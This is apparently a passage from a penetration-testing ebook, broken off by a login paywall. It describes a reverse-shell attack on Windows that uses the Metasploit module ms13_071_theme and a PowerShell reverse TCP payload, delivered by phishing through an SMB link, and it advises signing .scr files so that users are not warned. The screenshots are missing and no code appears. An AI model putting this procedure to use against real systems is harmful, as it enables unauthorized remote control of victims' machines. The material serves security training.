Single targets using a reverse shell with a PowerShell attack vector

In this section, we will take an example of similar exploitation. However, the vulnerability will exist in handling the screensaver path in which the arbitrary path can be used as the screensaver. This allows the attackers to run remote code execution. If the victim is away from their computer and if the screensaver is set to run, that is, Windows is trying to access the screensaver at regular intervals, the same exploit will be run every time.

We will be using ms13_071_theme, which initially affected only Windows XP and Windows 2003. However, it still works on Windows 7 and Windows 2008. Now let's equip Metasploit with all the required information such as payload, lhost, and lport, which are filled and ready to exploit, as shown in the following screenshot:

In this exploit, we will be using the PowerShell attack vector for the ReverseShell, so we will be using the windows/powershell_reverse_tcp payload.

The next step is to have the victim open the link through SMB; the means of dropping the exploit can be phishing or other social engineering techniques. Once the victim opens the link, some of the users may be alerted, as shown in the following screenshot:

So, for penetration testers, it is recommended to sign the .scr files as a legitimate internal user. The next step occurs when the user clicks on Run—that's it. This has now opened up a ReverseShell to the attacker with PowerShell, which allows attackers to run PowerShell commands on the victim system and escalate the privilege to the domain:

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
54.234.143.240